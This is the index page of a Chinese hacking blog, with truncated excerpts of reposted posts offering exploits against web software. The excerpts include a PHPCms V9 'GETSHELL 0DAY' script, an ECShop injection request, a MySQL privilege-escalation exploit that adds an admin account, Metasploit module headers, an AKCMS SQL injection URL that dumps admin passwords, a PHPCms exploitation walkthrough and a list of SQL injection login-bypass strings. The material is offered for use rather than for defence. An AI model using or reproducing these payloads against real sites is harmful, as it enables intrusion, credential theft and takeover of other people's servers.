小马博客

一个无聊的人,一个无聊的博客

转自:https://www.t00ls.net/thread-21381-1-1.html [php] //code by helen public function save_profile() { $user_info =@ ParamHolder::get('user', array());//获取数组 if (sizeof($user_info) <= 0) { ...

发布 0 条评论

把任意商品加入购物车在填写配送地址那一页,有地区选择 flow.php?step=consignee&direct_shopping=1 比如省选择安徽 其中POST数据如下 <strong><span style="color: #008000;">country=1&province=3&a...

发布 0 条评论

[php] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms o...

发布 0 条评论

[php] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms o...

发布 0 条评论

漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。   [php] use DBI(); $|=1; =for comment MySQL privilege elevatio...

发布 0 条评论

[php] <?php error_reporting(E_ERROR); set_time_limit(0); $pass="wooyun.in"; print_r(' +---------------------------------------------------------------------------+ PHPCms V9 GETSHELL 0DAY c0de by testr00...

发布 0 条评论

利用方法: 第一个:想办法找到目标网站的绝对路径 http://www.wooyun.in/install/svinfo.php?phpinfo=true http://www.wooyun.in/core/api/shop_api.php http://www.wooyun.in/core/api/site/2.0/api_b2b_2_0_cat.php http://www.w...

发布 0 条评论

爆管理员密码: http://www.xxx.com/akcms_keyword.php?sid=11111%27and %28select%201%20from%28select%20count%28*%29,concat%28% 28select%20%28select%20%28select%20concat%280x7e,0×27, password,0×27,0x7e%29%20from%20ak_admi...

发布 1 条评论

漏洞形成原因就不多说了 文件在phpcms/api.php 有兴趣的盆友可以多去挖一挖phpcms的洞子 主要利用过程: 第一步:注册一个用户 http://www.i0day.com//index.php?m=member&c=index&a=register&siteid=1 第二步:访问链...

发布 0 条评论

渗透常用万能密码 最新整理各类网站程序后台万能登陆密码大全: 好多后台默认密码 admin admin admin admin888 asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1--...

发布 0 条评论